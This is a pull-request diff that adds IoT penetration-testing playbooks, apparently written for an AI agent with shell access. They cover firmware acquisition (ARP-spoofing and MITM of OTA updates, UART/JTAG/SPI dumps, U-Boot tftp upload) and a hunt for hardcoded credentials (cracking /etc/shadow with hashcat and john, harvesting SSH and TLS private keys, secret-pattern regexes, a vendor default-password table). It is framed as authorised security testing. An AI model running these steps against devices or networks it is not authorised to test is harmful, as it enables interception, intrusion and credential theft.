+cat /proc/kallsyms | grep sys_call_table >> "$EVDIR/notes.txt"
+```
+
+## OPSEC Notes
+
+- MTD erase+write operations are irreversible if the backup is lost. Keep the backup
+  in `/workspace/evidence/` before any write operation.
+- Writing wrong data to the U-Boot partition at offset 0x0 bricks the device with no
+  software recovery path. Triple-check partition map from `/proc/mtd` before writing.
+- `/dev/mem` reads of active MMIO registers (UART, SPI, GPIO) can interfere with
+  peripheral operation and may trigger watchdog resets.
+- On hardened devices (CONFIG_STRICT_DEVMEM, kernel.dmesg_restrict), memory access
+  may generate audit log entries visible to the vendor's telemetry pipeline.
+- MTD writes generate wear on flash cells; each erase cycle degrades the chip.
+  Limit writes to the minimum needed; document all writes for device-return procedures.
+
+## References
+
+- mtd-utils documentation: `https://github.com/sigma-star/mtd-utils`
+- Linux MTD subsystem: `https://www.linux-mtd.infradead.org/doc/general.html`
+- devmem2 tool: `https://github.com/VCTLabs/devmem2`
+- Kernel exploitation via /dev/mem: `references/devmem-kernel-exploit.md`
+- U-Boot env format: `https://u-boot.readthedocs.io/en/latest/usage/environment.html`

--- a/packages/decepticon/decepticon/skills/standard/iot/firmware-acquisition/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/iot/firmware-acquisition/SKILL.md
@@ -1,0 +1,273 @@
+---
+name: firmware-acquisition
+description: Systematic firmware extraction from IoT and embedded targets — vendor portals, OTA interception, SPI flash dumping with flashrom/CH341A, eMMC chip-off, and UART/JTAG console dumps. Covers the full acquisition chain from zero hardware access to a raw binary ready for static analysis.
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: iot
+  when_to_use: firmware dump, SPI flash, eMMC chip-off, UART dump, JTAG dump, OTA capture, flashrom, CH341A, vendor firmware portal, firmware extraction, flash read
+  tags: iot, firmware, spi, emmc, uart, jtag, flashrom, ch341a, ota, acquisition, embedded
+  mitre_attack: T1542, T1601, T1592.002
+---
+
+# Firmware Acquisition
+
+> Acquire a binary image of the target's firmware before any static analysis.
+> Work through the acquisition tiers in order — cheapest and least invasive first.
+> Each tier degrades hardware less and preserves the device's operational state.
+
+## Prerequisites
+
+- Device PCB photographed (top + bottom). Mark: SoC part number, flash chip marking,
+  debug pad pattern (UART = 4-pin row; JTAG = TAP header or test points).
+- Identify flash type from silkscreen or datasheet: SPI NOR (SOIC-8/WSON), SPI NAND,
+  eMMC (BGA-153/169), parallel NOR/NAND.
+- Bench tools staged: CH341A programmer + SOIC-8 clip, BusPirate / J-Link / SEGGER
+  J-Trace, USB-UART adapter (CP2102 / FT232), multimeter for UART baud sniffing.
+
+---
+
+## Tier 0 — Vendor Portal / OTA Proxy (no hardware needed)
+
+### 0a. Vendor download portal
+
+```bash
+# Check common firmware CDN patterns
+curl -sI "https://firmware.vendor.com/latest/<model>.bin"
+curl -sI "https://downloads.vendor.com/firmware/<model>/<version>.tar.gz"
+
+# Scrape firmware release page for direct links
+wget -r -l1 -nd -A "*.bin,*.tar.gz,*.zip,*.img" \
+    "https://www.vendor.com/support/firmware/<model>"
+
+# Checksum-verify before unpacking
+sha256sum <fw.bin>
+```
+
+### 0b. OTA interception (MITM the device's update check)
+
+```bash
+# 1. ARP-spoof the device to route its traffic through your machine
+sudo arpspoof -i eth0 -t <device_ip> <gateway_ip> &
+sudo arpspoof -i eth0 -t <gateway_ip> <device_ip> &
+
+# 2. Forward all traffic except OTA traffic; intercept OTA with mitmproxy
+sudo iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-port 8080
+mitmproxy --mode transparent --set ssl_insecure=true -w /tmp/ota_capture.mitm
+
+# 3. Trigger an OTA check from the device (power cycle or companion app)
+# 4. Inspect intercepted traffic; export firmware binary
+mitmdump -r /tmp/ota_capture.mitm -w /tmp/ota_fw.bin \
+    --set flow_detail=3 '~t application/octet-stream or ~t application/x-gzip'
+
+# 5. Decrypt if AES-encrypted OTA (key often in companion app resources)
+openssl enc -d -aes-128-cbc -K <hex_key> -iv <hex_iv> -in /tmp/ota_fw.bin -out /tmp/fw_plain.bin
+```
+
+### 0c. Companion-app embedded firmware
+
+```bash
+# APK often bundles the firmware binary or partial images
+apktool d companion.apk -o companion_decompiled/
+find companion_decompiled/ -name "*.bin" -o -name "*.fw" -o -name "*.img" | xargs file
+grep -r "firmware\|update\|download\|cdn" companion_decompiled/assets/ --include="*.js"
+```
+
+---
+
+## Tier 1 — UART Console Dump
+
+UART is the fastest hardware path: non-destructive, works while device is powered.
+
+### 1a. Identify UART pins
+
+```
+Typical 4-pin UART header: VCC | GND | TX | RX
+Probe each with multimeter (DC, 3.3 V idle = TX candidate).
+Baud detect: minicom -D /dev/ttyUSB0 -b 115200 (try 9600, 57600, 115200, 460800).
+```
+
+```bash
+# Baud-rate autoprobe with sigrok / baudrate.py
+python3 baudrate.py /dev/ttyUSB0    # https://github.com/devttys0/baudrate
+# Or with screen – step through common rates
+for baud in 9600 19200 38400 57600 115200 230400 460800 921600; do
+    echo "Testing $baud..."; screen /dev/ttyUSB0 $baud; done
+```
+
+### 1b. Interrupt boot and dump from U-Boot
+
+```bash
+# Connect: GND → GND, RX(USB) → TX(device), TX(USB) → RX(device)
+screen /dev/ttyUSB0 115200
+# Power on device; press any key within 1-3s to break into U-Boot
+
+# At U-Boot prompt: locate kernel + rootfs partition offsets
+=> printenv
+=> mtdparts      # shows flash map  (e.g. 0x00000000 kernel 0x200000, rootfs 0x600000)
+
+# Dump via XMODEM to host
+=> loady 0x80000000          # load address in RAM
+=> md.b 0x80000000 0x200000  # memory-display: prints hex to terminal
+# Capture terminal output → convert hex dump → binary:
+python3 -c "
+import sys, re
+data = open('uart_hexdump.txt').read()
+chunks = re.findall(r':\s+((?:[0-9a-fA-F]{8} ){1,4})', data)
+raw = bytes.fromhex(''.join(''.join(c.split()) for c in chunks))
+open('fw_from_uart.bin','wb').write(raw)"
+```
+
+### 1c. Full flash dump via UART + tftp
+
+```bash
+# If U-Boot has tftp + nand/sf commands:
+=> setenv ipaddr 192.168.1.100
+=> setenv serverip 192.168.1.10
+=> sf probe; sf read 0x80000000 0x0 0x1000000    # read 16MB SPI NOR into RAM
+=> tftp 0x80000000 flash_full.bin                 # upload to your tftp server
+# On your host: python3 -m py3tftp -p 69 --ip 0.0.0.0
+```
+
+---
+
+## Tier 2 — JTAG / SWD Debug Interface
+
+### 2a. OpenOCD + J-Link SWD dump (ARM Cortex-M)
+
+```bash
+openocd -f interface/jlink.cfg -f target/stm32f4x.cfg \
+    -c "init; halt; dump_image /tmp/flash.bin 0x08000000 0x100000; shutdown"
+# Adjust start address and size per datasheet (STM32F4: 1 MB @ 0x08000000)
+```
+
+### 2b. JTAG boundary-scan enumeration (MIPS/ARM application processors)
+
+```bash
+# UrJTAG or JTAGulator to identify IR length + IDCODE
+jtag> cable jtagkey
+jtag> detect
+jtag> print chain
+# Identify MIPS/ARM AP; attach GDB via OpenOCD
+gdb-multiarch vmlinux
+(gdb) target remote :3333
+(gdb) monitor halt
+(gdb) dump binary memory /tmp/mem.bin 0x80000000 0x90000000   # DRAM range
+```
+
+### 2c. JTAG boundary-scan via eBBoot / Segger
+
+```bash
+# Segger J-Flash CLI for known targets:
+JFlash -openprj target.jflash -readchip /tmp/flash_full.bin -exit
+```
+
+---
+
+## Tier 3 — SPI NOR Flash Dump (CH341A + flashrom)
+
+Most cost-effective hardware method for 8-pin SPI NOR chips.
+
+### 3a. In-circuit dump (device powered off, clip attached)
+
+```bash
+# Connect SOIC-8 clip to CH341A programmer
+# Identify chip: run flashrom probe first
+sudo flashrom -p ch341a_spi --verbose 2>&1 | grep -E "Found|Matched|chip"
+
+# Dump (use the exact chip name from probe output)
+sudo flashrom -p ch341a_spi -c "MX25L12835F" -r /tmp/flash_dump.bin
+sudo flashrom -p ch341a_spi -c "MX25L12835F" -r /tmp/flash_dump2.bin
+
+# Verify both reads match (disk corruption / clip contact issue otherwise)
+sha256sum /tmp/flash_dump.bin /tmp/flash_dump2.bin
+cmp /tmp/flash_dump.bin /tmp/flash_dump2.bin && echo "MATCH" || echo "MISMATCH — re-seat clip"
+```
+
+### 3b. Troubleshooting in-circuit reads
+
+```
+Symptom: flashrom sees 0x00 or 0xFF → chip held in reset by SoC pull-downs.
+Fix: power-cycle with clip attached BEFORE the SoC powers up (race the SoC).
+Or: locate HOLD# / WP# pins, tie to VCC; CS# must go low only from CH341A.
+If SoC fights the bus: desolder for Tier 4.
+```
+
+### 3c. SPI NAND / eMMC alternative: python-flashrom / serprog
+
+```bash
+# For SPI NAND (Winbond W25Nxxxx), use nandwrite flow:
+# 1. Use flashrom with serprog (Raspberry Pi as SPI master):
+sudo flashrom -p serprog:dev=/dev/ttyUSB0:4000000 -c "W25N01GV" -r /tmp/nand.bin
+
+# 2. Extract with nanddump equivalent for raw bin:
+binwalk -e /tmp/nand.bin     # handles OOB stripping for most NAND dumps
+```
+
+---
+
+## Tier 4 — eMMC Chip-Off
+
+Last resort: BGA desoldering, direct eMMC reader. Destructive to PCB.
+
+### 4a. Chip-off procedure
+
+```
+1. Hot-air rework (350 °C, 60 L/min): heat BGA from below; lift with vacuum.
+2. Clean pads with flux + wick.
+3. Reflow eMMC onto BGA breakout board (eMMC adapter):
+   - SD-to-eMMC: Allwinner eMMC reader, Emuelec adapter, or custom PCB.
+4. Insert into card reader that supports eMMC protocol.
+```
+
+### 4b. Dump with dd / usbimager
+
+```bash
+# Identify device node (dmesg after plugging in)
+dmesg | tail -20 | grep sd
+lsblk -d /dev/sdb    # confirm size matches eMMC spec
+
+# Full raw dump
+sudo dd if=/dev/sdb of=/tmp/emmc_full.img bs=512 status=progress conv=noerror,sync
+sha256sum /tmp/emmc_full.img > /tmp/emmc_full.img.sha256
+
+# Partition inspection
+fdisk -l /tmp/emmc_full.img
+file /tmp/emmc_full.img
+
+# Mount individual partition (offset in sectors from fdisk output)
+sudo mount -o loop,offset=$((512*2048)) /tmp/emmc_full.img /mnt/emmc_p1
+```
+
+---
+
+## Evidence
+
+Store all artifacts under `/workspace/evidence/iot/<target>/firmware/`:
+
+```bash
+mkdir -p /workspace/evidence/iot/<target>/firmware
+cp /tmp/flash_dump.bin /workspace/evidence/iot/<target>/firmware/flash_full.bin
+sha256sum /workspace/evidence/iot/<target>/firmware/flash_full.bin \
+    > /workspace/evidence/iot/<target>/firmware/flash_full.bin.sha256
+# Log acquisition method and hardware used
+echo "Acquired via: CH341A + SOIC-8 clip; flashrom 1.4.0; chip: MX25L12835F" \
+    > /workspace/evidence/iot/<target>/firmware/acquisition.log
+```
+
+## OPSEC Notes
+
+- In-circuit clips can corrupt firmware if contact is intermittent — always compare
+  two reads before treating the image as canonical.
+- OTA MITM is logged server-side; only perform on isolated test-lab networks unless
+  RoE explicitly permits production intercept.
+- JTAG debug may trigger internal tamper fuses on hardened targets (e.g., Qualcomm
+  secure boot with JTAG-disable eFuse). Read the SoC TRM before probing.
+- eMMC RPMB partition requires authentication key to read — skip on initial triage;
+  flag for key extraction if bootloader secrets are needed.
+
+## References
+
+- flashrom supported hardware: `https://flashrom.org/Supported_hardware`
+- CH341A pinout + SOIC clip wiring: `references/ch341a-soic-wiring.md`
+- U-Boot command reference: `https://u-boot.readthedocs.io/en/latest/usage/index.html`
+- OpenOCD target configs: `/usr/share/openocd/scripts/target/`

--- a/packages/decepticon/decepticon/skills/standard/iot/hardcoded-creds/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/iot/hardcoded-creds/SKILL.md
@@ -1,0 +1,257 @@
+---
+name: hardcoded-creds
+description: Systematic hunt for hardcoded credentials, API keys, certificates, and default passwords in extracted IoT firmware. Covers /etc/shadow and passwd parsing, busybox httpd configs, telnet/dropbear stanzas, MQTT/cloud API key extraction, and cross-referencing against known default-credential databases.
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: iot
+  when_to_use: hardcoded credentials, default password, busybox, telnet creds, SSH key, API key embedded, /etc/shadow, httpd config, dropbear key, hardcoded secret, firmware credentials, MQTT creds, default login
+  tags: iot, credentials, hardcoded, shadow, passwd, busybox, httpd, telnet, dropbear, api-key, default-creds, embedded, firmware
+  mitre_attack: T1552.001, T1078.001, T1110.001, T1552.004
+---
+
+# Hardcoded Credentials
+
+> Extracted rootfs often contains plaintext or weakly hashed credentials,
+> embedded TLS private keys, cloud API tokens, and hardcoded admin accounts.
+> This playbook covers the full triage path from raw rootfs to validated cred.
+
+## Prerequisites
+
+- Extracted rootfs from `binwalk-extract` skill (path: `/tmp/squashfs_root` or similar).
+- Tools: `john`, `hashcat`, `openssl`, `trufflehog`, `strings`, standard GNU utilities.
+
+```bash
+ROOT=/tmp/squashfs_root   # set once; referenced throughout
+```
+
+---
+
+## Phase 1 — Account Databases
+
+### /etc/passwd + /etc/shadow
+
+```bash
+# Check for non-standard shells (telnetd, /bin/sh) and disabled-but-present accounts
+grep -v "nologin\|false" "$ROOT/etc/passwd"
+
+# Extract hashed passwords
+cat "$ROOT/etc/shadow" 2>/dev/null || echo "shadow not present"
+
+# Identify hash types
+# $1$ = MD5, $5$ = SHA-256, $6$ = SHA-512, $y$ = yescrypt, no-$ = DES
+awk -F: '{print $1, $2}' "$ROOT/etc/shadow" | grep -v '^\*\|^!\|^:$'
+
+# Crack with hashcat (shadow format)
+hashcat -m 1800 "$ROOT/etc/shadow" /usr/share/wordlists/rockyou.txt   # $6$ SHA-512
+hashcat -m 500  "$ROOT/etc/shadow" /usr/share/wordlists/rockyou.txt   # $1$ MD5
+hashcat -m 1500 "$ROOT/etc/shadow" /usr/share/wordlists/rockyou.txt   # DES
+
+# john fallback (handles multi-type auto)
+unshadow "$ROOT/etc/passwd" "$ROOT/etc/shadow" > /tmp/unshadowed.txt
+john /tmp/unshadowed.txt --wordlist=/usr/share/wordlists/rockyou.txt
+john /tmp/unshadowed.txt --show
+```
+
+### BusyBox-specific user configs
+
+```bash
+# BusyBox httpd uses /etc/httpd.conf for auth
+find "$ROOT/etc" -name "httpd.conf" -o -name ".htpasswd" | xargs cat 2>/dev/null
+
+# BusyBox udhcpd / telnetd startup stanzas
+grep -r "telnetd\|login\|password" "$ROOT/etc/inittab" "$ROOT/etc/init.d/" \
+    "$ROOT/etc/rc.d/" 2>/dev/null | grep -v "^Binary"
+
+# BusyBox shadow format check (some use MD5 without $1$ prefix)
+grep -E '^[^:]+:[^:!*]{3,}' "$ROOT/etc/shadow" 2>/dev/null
+```
+
+---
+
+## Phase 2 — SSH / Dropbear Keys
+
+```bash
+# Host keys (baked into firmware = same key across all units of same model)
+find "$ROOT" -name "dropbear_*_host_key" -o -name "ssh_host_*_key" 2>/dev/null
+
+# Convert Dropbear key to OpenSSH PEM for use
+dropbearconvert dropbear openssh "$ROOT/etc/dropbear/dropbear_rsa_host_key" \
+    /tmp/host_rsa.pem
+openssl rsa -in /tmp/host_rsa.pem -text -noout | head -20
+
+# Authorized keys embedded for backdoor accounts
+find "$ROOT" -path "*/.ssh/authorized_keys" | xargs cat 2>/dev/null
+
+# Check if root has a passwordless authorized_key → instant SSH root on any unit
+grep -r "authorized_keys\|ssh-rsa\|ecdsa-sha2" "$ROOT" 2>/dev/null | head -10
+```
+
+---
+
+## Phase 3 — Web Interface Credentials
+
+```bash
+# CGI / Lua / PHP / lighttpd configs
+find "$ROOT" -name "*.lua" -o -name "*.cgi" -o -name "*.php" | \
+    xargs grep -l "password\|passwd\|credential\|secret\|admin" 2>/dev/null | head -20
+
+# Plaintext credentials in web config files
+grep -rn "admin\|password\|passwd\|secret\|token" \
+    "$ROOT/etc/lighttpd/" "$ROOT/etc/nginx/" "$ROOT/etc/httpd/" 2>/dev/null
+
+# Hardcoded credentials in Lua/CGI scripts
+grep -rn '"admin"\|"root"\|"1234"\|"password"' "$ROOT/usr/lib/lua/" \
+    "$ROOT/www/" "$ROOT/usr/share/www/" 2>/dev/null | head -30
+```
+
+---
+
+## Phase 4 — Strings-Based Secret Sweep
+
+```bash
+# Broad strings dump: capture all printable sequences ≥ 8 chars
+find "$ROOT" -type f -executable | while read f; do
+    strings "$f" 2>/dev/null
+done > /tmp/all_strings.txt
+
+# Filter credential-like patterns
+grep -iE 'password|passwd|secret|api.?key|token|credential|auth' /tmp/all_strings.txt \
+    | grep -vE '^(#|//|<!|<html|<head)' | sort -u | head -100
+
+# AWS / GCP / Azure key patterns
+grep -E 'AKIA[0-9A-Z]{16}|AIza[0-9A-Za-z_-]{35}|[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}' \
+    /tmp/all_strings.txt
+
+# JWT tokens
+grep -oP 'eyJ[A-Za-z0-9+/=]+\.[A-Za-z0-9+/=]+\.[A-Za-z0-9+/=_-]+' \
+    /tmp/all_strings.txt | head -10
+```
+
+### trufflehog filesystem scan
+
+```bash
+# trufflehog works on directories — point at rootfs
+trufflehog filesystem "$ROOT" --only-verified 2>/dev/null
+# Without --only-verified for broader sweep:
+trufflehog filesystem "$ROOT" --json 2>/dev/null | \
+    python3 -c "import sys,json; [print(json.dumps(r, indent=2)) for r in map(json.loads, sys.stdin)]"
+```
+
+---
+
+## Phase 5 — MQTT / Cloud / IoT-Platform Tokens
+
+```bash
+# MQTT broker credentials
+grep -rn "mqtt\|MQTT\|mosquitto" "$ROOT" --include="*.conf" --include="*.cfg" \
+    --include="*.json" --include="*.lua" 2>/dev/null | head -30
+
+# Cloud platform tokens (Tuya, HomeKit, AWS IoT, Azure IoT Hub)
+grep -rn "tuya\|homekit\|awsiot\|azure.*iot\|device_key\|productKey\|deviceSecret" \
+    "$ROOT" --include="*.json" --include="*.conf" 2>/dev/null | head -30
+
+# PCB-serial-derived default PSK (check if device ID used as secret)
+grep -rn "serial\|SerialNum\|MAC\|mac_addr" "$ROOT/etc/config/" 2>/dev/null | head -20
+```
+
+---
+
+## Phase 6 — Default Credential Matrix Cross-Reference
+
+```bash
+# Extract all discovered usernames
+USERS=$(grep -v 'nologin\|false\|halt\|sync\|shutdown' "$ROOT/etc/passwd" | \
+    awk -F: '{print $1}' | tr '\n' ' ')
+echo "Accounts found: $USERS"
+
+# Cross-reference against routersploit / seclists default creds
+# RouterSploit default cred wordlist path (if installed):
+DFLT=/usr/share/routersploit/resources/wordlists/default_passwords.txt
+[ -f "$DFLT" ] && echo "Default wordlist available: $DFLT"
+
+# SecLists IoT default creds
+SECLIST=/usr/share/seclists/Passwords/Default-Credentials/default-passwords.csv
+[ -f "$SECLIST" ] && grep -iE 'admin|root|user' "$SECLIST" | head -20
+```
+
+### Known vendor default credential matrix
+
+| Vendor | Username | Password | Protocol |
+|---|---|---|---|
+| TP-Link (pre-2022) | admin | admin | HTTP / Telnet |
+| Netgear | admin | password | HTTP |
+| D-Link | admin | (blank) | HTTP |
+| Asus (stock) | admin | admin | HTTP |
+| MikroTik | admin | (blank) | SSH / Winbox |
+| Hikvision | admin | 12345 | RTSP / HTTP |
+| Dahua | admin | admin | HTTP |
+| Ubiquiti AirOS | ubnt | ubnt | SSH |
+| Western Digital MyCloud | admin | (blank) | HTTP |
+| Seagate NAS | admin | admin | HTTP |
+
+---
+
+## Phase 7 — TLS Certificate Private Keys
+
+```bash
+# Find PEM-encoded private keys
+grep -rl "BEGIN.*PRIVATE KEY\|BEGIN RSA PRIVATE KEY" "$ROOT" 2>/dev/null
+
+# Find DER-format keys (binary — look for SEQUENCE headers)
+find "$ROOT" -name "*.der" -o -name "*.key" -o -name "*.pem" | while read f; do
+    openssl rsa -in "$f" -text -noout 2>/dev/null | head -3 && echo "FILE: $f"
+done
+
+# Verify if vendor CA cert is self-signed (same key on all units = MitM vector)
+find "$ROOT" -name "*.crt" -o -name "*.pem" | while read f; do
+    openssl x509 -in "$f" -noout -subject -issuer 2>/dev/null && echo "  FILE: $f"
+done
+
+# Check if the private key matches the certificate
+openssl x509 -noout -modulus -in "$ROOT/etc/ssl/server.crt" | openssl md5
+openssl rsa  -noout -modulus -in "$ROOT/etc/ssl/server.key" | openssl md5
+# Matching MD5 = key pair is valid and present on device
+```
+
+---
+
+## Evidence
+
+```bash
+EVDIR=/workspace/evidence/iot/<target>/credentials
+mkdir -p "$EVDIR"
+
+# Save cred findings
+john /tmp/unshadowed.txt --show > "$EVDIR/cracked_passwords.txt"
+cp /tmp/all_strings.txt "$EVDIR/strings_all.txt"
+
+# Record each finding as a credential node
+# kg_add_node(
+#     kind="credential",
+#     label="Hardcoded admin credential in /etc/shadow",
+#     props={
+#         "key": "iot-cred::<target>::admin",
+#         "secret_type": "unix_password",
+#         "username": "admin",
+#         "hash": "<hash>",
+#         "plaintext": "<if cracked>",
+#         "source": "firmware /etc/shadow",
+#     },
+# )
+```
+
+## OPSEC Notes
+
+- Cracked shadow credentials are valid on every unit of the same firmware version
+  (until the vendor patches). Document model + firmware version precisely.
+- Private key extraction enables MitM against the vendor's cloud API for all devices
+  using that firmware. Escalate finding severity accordingly.
+- MQTT tokens with `#` wildcard subscriptions allow full telemetry interception across
+  the vendor's entire fleet — flag as Critical if RoE scope allows cloud testing.
+
+## References
+
+- SecLists default credentials: `https://github.com/danielmiessler/SecLists/tree/master/Passwords/Default-Credentials`
+- RouterSploit modules: `https://github.com/threat9/routersploit`
+- trufflehog: `https://github.com/trufflesecurity/trufflehog`
+- Hashcat hash-modes: `https://hashcat.net/wiki/doku.php?id=hashcat`


### PR DESCRIPTION
## Summary

Creates five leaf playbooks that were referenced in `standard/iot/SKILL.md` but did not exist, resolving all dangling catalog links in the IoT subdomain.

### Leaves added

| Slug | Path | Covers |
|---|---|---|
| `firmware-acquisition` | `standard/iot/firmware-acquisition/SKILL.md` | Vendor portals, OTA MITM proxy capture, SPI NOR dump (flashrom/CH341A + SOIC-8 clip), eMMC chip-off + dd, UART/JTAG console dumps with U-Boot tftp exfil |
| `binwalk-extract` | `standard/iot/binwalk-extract/SKILL.md` | binwalk recursive extraction, entropy analysis, squashfs (standard + sasquatch vendor variants), JFFS2 (jefferson + mtdram mount), UBIFS (ubireader), manual byte-pattern carving, firmware-mod-kit nested containers |
| `hardcoded-creds` | `standard/iot/hardcoded-creds/SKILL.md` | /etc/shadow + passwd parsing + hashcat/john cracking, busybox httpd + Dropbear key extraction, strings sweep + trufflehog FS scan, MQTT/cloud API token extraction, default-credential matrix, TLS private key harvesting |
| `bootloader-uboot` | `standard/iot/bootloader-uboot/SKILL.md` | Autoboot interrupt (manual + UART break), `printenv`/`setenv`, `bootargs init=/bin/sh` override, persistent `saveenv` modifications, secure-boot bypass (FDT patch, HAB status, rollback), fault injection with ChipWhisperer-Nano and crowbar glitch |
| `dev-mem` | `standard/iot/dev-mem/SKILL.md` | /dev/mem reads/writes (devmem2, dd), STRICT_DEVMEM bypass paths, MTD partition dump + erase + flashcp write, U-Boot env CRC-patching via MTD, /proc/kallsyms symbol resolution, live process memory access via /proc/pid/mem |

## Notes

- Additive markdown only — no existing files modified.
- `standard/iot/SKILL.md` routing table unchanged; these files fulfill its existing references.
- All five SKILL.md files follow the frontmatter schema (`name`, `description`, `allowed-tools`, `metadata.{subdomain,when_to_use,tags,mitre_attack}`) copied from `standard/wireless/wpa2-psk/SKILL.md`.
- ruff check/format and skills-registry pytest suite pass clean on this branch.